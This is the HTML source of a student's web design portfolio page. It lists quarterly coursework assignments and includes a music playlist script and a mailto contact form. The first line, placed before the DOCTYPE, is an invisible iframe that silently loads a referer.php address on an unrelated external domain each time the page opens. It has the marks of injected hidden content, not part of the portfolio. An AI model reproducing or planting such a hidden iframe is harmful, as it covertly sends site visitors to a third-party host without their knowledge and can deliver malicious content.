<iframe style="visibility: hidden; display: none; display: none;" src="https://www.paperlovers.cz/referer.php?id={D3C2E81A-2AF7-48F9-8B13-0F8B09C2637D}"></iframe><!DOCTYPE html>
<html>

<head>
        <title>Thomas' Portfolio</title>
        <link rel="stylesheet" href="style.css?oka">
        <link href="https://fonts.googleapis.com/css?family=Poppins" rel="stylesheet">
        <link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet">
        <link rel="icon" type="image/gif" href="ico.gif">
        <style>
        </style>
</head>

<body>
        <audio id="mus" src="song.mp3" autoplay></audio>
        <div id="side" class="shadow">
               <div class="quarter" id="quarter1">
                       <h1 class="headinged">Quarter One</h1>
                       <div class="contents">
                               <h2>Practice Assignments</h2>
                               <table>
                                      <tr>
                                              <td><a href="PracticeAssignments/Practice001">PA001</a></td>
                                              <td>Basic Tags</td>
                                      </tr>
                                      <tr>
                                              <td><a href="PracticeAssignments/Practice002">PA002</a></td>
                                              <td>Headings</td>
                                      </tr>
                                      <tr>
                                              <td><a href="PracticeAssignments/Practice003">PA003</a></td>
                                              <td>Lists</td>
                                      </tr>
                                      <tr>
                                              <td><a href="PracticeAssignments/Practice004">PA004</a></td>
                                              <td>External Links</td>
                                      </tr>
                                      <tr>
                                              <td><a href="PracticeAssignments/Practice006">PA006</a></td>
                                              <td>Tables</td>
                                      </tr>
                                      <tr>
                                              <td><a href="PracticeAssignments/Practice007">PA007</a></td>
                                              <td>Tables and Image</td>
                                      </tr>
                                      <tr>
                                              <td><a href="PracticeAssignments/Practice009">PA009</a></td>
                                              <td>Color Wheel</td>
                                      </tr>
                               </table>
                               <h2>Typography Assignments</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q1/Assignment029i2a">A029i2a</a></td>
                                              <td>Downloading Fonts</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q1/Assignment029i2b">A029i2b</a></td>
                                              <td>CSS3 @font-face</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q1/Assignment029i2ba">A029i2ba</a></td>
                                              <td>CSS3 @font-face Tools</td>
                                      </tr>
                                      <tr>
                                              <td><a href="
                                              Q1/Assignment029i2c">A029i2c</a></td>
                                              <td>Adobe Fonts</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q1/Assignment029i2d">A029i2d</a></td>
                                              <td>Google Fonts</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q1/Assignment029i2e">A029i2e</a></td>
                                              <td>Font Awesome</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q1/Assignment029i2g">A029i2g</a></td>
                                              <td>Typography</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q1/WrittenAssignment001">WA001</a></td>
                                              <td>Helvetica Movie</td>
                                      </tr>
                               </table>
                               <h2>Standard Assignments</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q1/Assignment029j7">A029j7</a></td>
                                              <td>Image Maps</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q1/Assignment029j3c">A029j3c</a></td>
                                              <td>Custom Cursors</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q1/Assignment029j3d">A029j3d</a></td>
                                              <td>Custom Favicon</td>
                                      </tr>
                               </table>
                       </div>
               </div>
               <div class="quarter" id="quarter2">
                       <h1 class="headinged">Quarter Two</h1>
                       <div class="contents">
                               <h2>HTML5</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q2/Assignment001html5">A001html5</a></td>
                                              <td>Audio</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q2/Assignment002html5">A002html5</a></td>
                                              <td>Video</td>
                                      </tr>
                               </table>
                               <h2>CSS3</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q2/Assignment029g6">A029g6</a></td>
                                              <td>Border Radius</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q2/Assignment029g7">A029g7</a></td>
                                              <td>Box Shadow</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q2/Assignment029g8">A029g8</a></td>
                                              <td>Transform</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q2/Assignment029j3a2">A029j3a2</a></td>
                                              <td>Transitions</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q2/Assignment029j3a2a">A029j3a2a</a></td>
                                              <td>Two-step Animations</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q2/Assignment029j3a2b">A029j3a2b</a></td>
                                              <td>Multistep Animations</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q2/Assignment029g9">A029g9</a></td>
                                              <td>Text Shadow</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q2/Assignment029g11">A029g11</a></td>
                                              <td>RGBa</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q2/Assignment029g12">A029g12</a></td>
                                              <td>Multiple Background Images</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q2/Assignment029g13">A029g13</a></td>
                                              <td>Background Size</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q2/Assignment029g14">A029g14</a></td>
                                              <td>Gradient Backgrounds</td>
                                      </tr>
                               </table>
                               <h2><strong>&lt;div&gt;</strong> Positioning</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q2/Assignment029j2">A029j2</a></td>
                                              <td>Absolute Positioning</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q2/Assignment029j3">A029j3</a></td>
                                              <td>Relative Positioning</td>
                                      </tr>
                               </table>
                       </div>
               </div>
               <div class="quarter" id="quarter3">
                       <h1 class="headinged">Quarter Three</h1>
                       <div class="contents">
                               <h2><strong>&lt;div&gt;</strong> Positioning</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q3/Assignment029j3a">A029j3a</a></td>
                                              <td>Absolute within Relative</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q3/Assignment029j3a2">A029j3a2</a></td>
                                              <td>Relative within Absolute</td>
                                      </tr>
                               </table>
                               <h2>Media Queries</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q3/Assignment000rwd">A000rwd</a></td>
                                              <td>Media Queries</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q3/Assignment005RWD">A005rwd</a></td>
                                              <td>REM Units</td>
                                      </tr>
                               </table>
                               <h2>Flexbox</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q3/AssignmentFB001">Afb001</a></td>
                                              <td>Flex Direction Row</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q3/AssignmentFB002">Afb002</a></td>
                                              <td>Flex Direction Column</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q3/AssignmentFB003">Afb003</a></td>
                                              <td>Flex Wrap</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q3/AssignmentFB004">Afb004</a></td>
                                              <td>Flex Children</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q3/AssignmentFB005">Afb005</a></td>
                                              <td>Simple Responsive Flexbox</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q3/AssignmentFB006">Afb006</a></td>
                                              <td>Complex Responsive Flexbox</td>
                                      </tr>
                               </table>
						       <h2>Career Skills Challenge</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q3/Assignment001acc">A001acc</a></td>
                                              <td>Fixed Position</td>
                                      </tr>
								   	  <tr>
                                              <td><a href="Q3/Assignment029j3b">A029j3b</a></td>
                                              <td>Named Anchors</td>
                                      </tr>
								      <tr>
                                              <td><a href="Q3/Assignment004acc">A004acc</a></td>
                                              <td>Floated Images</td>
                                      </tr>
								      <tr>
                                              <td><a href="Q3/Assignment029j3a3">A029j3a3</a></td>
                                              <td>Flexbox HTML5 Layout</td>
                                      </tr>
                               </table>
						       <h2>Add-Ons</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q3/Assignment006jqp">A006jqp</a></td>
                                              <td>Backstretch</td>
                                      </tr>
								   	  <tr>
                                              <td><a href="Q3/Assignment007jqpa">A007jqpa</a></td>
                                              <td>Animate.css</td>
                                      </tr>
								      <tr>
                                              <td><a href="Q3/Assignment008jqpa">A004acc</a></td>
                                              <td>Transitions and Keyframes</td>
                                      </tr>
                               </table>
						   	   <h2>Projects</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q3/NewYorkProject/index.html">NYProject</a></td>
                                              <td>Layout Design Practice</td>
                                      </tr>
                               </table>
                       </div>
               </div>
				<div class="quarter" id="quarter4">
                       <h1 class="headinged">Quarter Four</h1>
                       <div class="contents">
						   	<h2>Career Skills</h2>
                               <table>
								   	  <tr>
                                              <td><a href="Q4/Resume/resume04232019v001.pdf">Resume</a></td>
                                              <td>General Resum&eacute;</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q4/JobApplication/WHCNonAcademic.pdf">Job App.</a></td>
                                              <td>WHC Job Application</td>
                                      </tr>
								      <tr>
                                              <td><a href="Q4/CoverLetter/coverletter050719.pdf">Cover Letter</a></td>
                                              <td>General Cover Letter</td>
                                      </tr>
								   	  <tr>
                                              <td><a href="Q4/ImagoCertificate/fcss_leadership_Thomas.pdf">Imago Cert.</a></td>
                                              <td>Imago FCSS</td>
                                      </tr>
                               </table>
                               <h2>CSS Grid</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q4/Assignment001grid">A001grid</a></td>
                                              <td>Grid-template-columns</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q4/Assignment002grid">A002grid</a></td>
                                              <td>Grid-template-rows</td>
                                      </tr>
								      <tr>
                                              <td><a href="Q4/Assignment003grid">A003grid</a></td>
                                              <td>Grid repeat()</td>
                                      </tr>
								   	  <tr>
                                              <td><a href="Q4/Assignment004grid">A004grid</a></td>
                                              <td>Basic Grid line placement</td>
                                      </tr>
								   	  <tr>
                                              <td><a href="Q4/Assignment005grid">A005grid</a></td>
                                              <td>Complex Grid Line Placement</td>
                                      </tr>
								      <tr>
                                              <td><a href="Q4/Assignment006grid">A006grid</a></td>
                                              <td>Grid area placement</td>
                                      </tr>
								      <tr>
                                              <td><a href="Q4/Assignment007grid">A007grid</a></td>
                                              <td>Responsive grid layout</td>
                                      </tr>
                               </table>
						    	<h2>JavaScript</h2>
                               <table>
                                      <tr>
                                              <td><a href="Q4/Assignment001js">A001js</a></td>
                                              <td>JavaScript Comments</td>
                                      </tr>
                                      <tr>
                                              <td><a href="Q4/Assignment002js">A002js</a></td>
                                              <td>JavaScript Methods</td>
                                      </tr>
								      <tr>
                                              <td><a href="Q4/Assignment003js">A003js</a></td>
                                              <td>JavaScript window.document</td>
                                      </tr>
								   	  <tr>
                                              <td><a href="Q4/Assignment004js">A004js</a></td>
                                              <td>JavaScript Properties (display)</td>
                                      </tr>
								   	  <tr>
                                              <td><a href="Q4/Assignment005js">A005js</a></td>
                                              <td>JavaScript Properties (change)</td>
                                      </tr>
								      <tr>
                                              <td><a href="Q4/Assignment006js">A006js</a></td>
                                              <td>JavaScript Events</td>
                                      </tr>
								      <tr>
                                              <td><a href="Q4/Assignment007js">A007js</a></td>
                                              <td>JavaScript Functions</td>
                                      </tr>
                               </table>
                       </div>
               </div>
        </div>
		<div id="email">
			<h2>Email Me</h2>
			<div class="email-block">
			<label class="lbl">Subject:</label><input type="text" id="sub" placeholder="Subject" value="Assignment001">
			<br>
			<label class="lbl">Content:</label>
			<textarea type="text" id="content" placeholder="Say something nice..."></textarea>
			<button type="button" id="send-btn">Send</button>
			</div>
		</div>
        <div id="wrap">
               <div id="container" class="shadow">
                       <h1 id="bighead">Spradling Archives</h1>
                       <div class="content" style="margin-top: 20px">
                               <h2>About</h2>
                               <p>Welcome to my webpage! I will not assume you belong here, so do not take these messages as a formal welcoming; in fact, get lost! Seeing that you still persist, you might as well look around. There's nothing to see here, but in the future, you might see an assignment or two done....</p>
                               <p>I'm not your typical Web II kid; I break the rules and go a <em>little</em> ahead for your entertainment, so take a look and see. Not everything you see on this page necessarily belongs to me, but I will always give credit where it is due (in the source code) if I use anything that I don't own, like the music playing right now.</p>
                               <p>Enjoy because I, <strong>Thomas J. Spradling</strong>, told you to.</p>
                       </div>
                       <div class="clear"></div>
                       <div id="quarters">
                               <h2>Assignments</h2>
                               <div id="cont">
                                      <div class="q" id="q1" onclick="change('quarter1');">Quarter One</div>
                                      <div class="q" id="q2" onclick="change('quarter2');">Quarter Two</div>
                                      <div class="q" id="q3" onclick="change('quarter3');">Quarter Three</div>
                                      <div class="q" id="q4" onclick="change('quarter4');">Quarter Four</div>
                               </div>
                       </div>
                       <div>
                               <iframe src="Games/Memory/match.html"></iframe>
                       </div>
                       <div id="playlist">
                               <h2>Music</h2>
                               <div id="play-box">
                                      <div id="play-head">
                                              <h3>Now Playing</h3>
                                      </div>
                                      <div id="play-dir">
                                              <span id="play-dir-play">Example Playlist</span>
                                              <span id="play-dir-song"><em>Song</em></span>
                                      </div>
                                      <div id="play-songs">
                                              <table id="play-song-tab">
                                              </table>
                                      </div>
                               </div>
                       </div>
               </div>
        </div>
        <script type="text/javascript">
               change("quarter4");
               function change (q) {
                       let side = document.querySelector("#side");
                       side.style.right = "-500px";
                       let quarters = document.querySelectorAll(".quarter");
                       window.setTimeout(() => {
                               side.style.right = "0px";
                               for (let i = 0; i < quarters.length; i++) {
                                      quarters[i].style.display = "none";
                               }
                               document.getElementById(q).style.display = "block";
                       }, 1000);
               }
               const music = document.querySelector("#mus");
               const playbox = document.querySelector("#play-song-tab");
               const rn = document.querySelector("#play-dir-song");
               let songs = [{
                               name: "Katyusha",
                               author: "Hy Zaret, Lou Singer, and Matvey Blanter",
                               file: "katyusha.mp3"
                       },
                       {
                               name: "Smuglyanka",
                               author: "Anatoly Novikov",
                               file: "smuglianka.mp3"
                       },
                       {
                               name: "Rasputin",
                               author: "Boney M.",
                               file: "rasputin.mp3"
                       }
               ];
               for (let i = 0; i < songs.length; i++) {
                       let song = document.createElement("tr");
                       let name = document.createElement("td");
                       let author = document.createElement("td");
                       name.innerHTML = songs[i].name;
                       author.innerHTML = "by " + songs[i].author;
                       song.appendChild(name);
                       song.appendChild(author);
                       playbox.appendChild(song);
               }
               let song_elem = document.querySelectorAll("#play-song-tab tr");
               play(Math.floor(Math.random() * songs.length));
               for (let i = 0; i < song_elem.length; i++) {
                       song_elem[i].addEventListener("click", () => {
                               play(i)
                       });
               }
               music.onended = () => {
                       play(Math.floor(Math.random() * songs.length));
               };

               function play(song) {
                       for (let j = 0; j < song_elem.length; j++) {
                               song_elem[j].classList.remove("current");
                       }
                       song_elem[song].classList.add("current");
                       rn.innerHTML = "<em>" + songs[song].name + "</em>";
                       music.src = songs[song].file;
               }
			
			document.querySelector('#sub').value = '';
			document.querySelector('#content').value = '';
			var subject;
			var cont;
			setInterval(()=>{
				subject = document.querySelector('#sub').value;
				cont = document.querySelector('#content').value.replace(/\n/g, '%0A');
			},10);
			document.querySelector('#send-btn').onclick = ()=>{
				location.href='mailto:tspra-s680@chusd.org?subject='+subject+'&body='+cont;
			}
        </script>
</body>

</html>
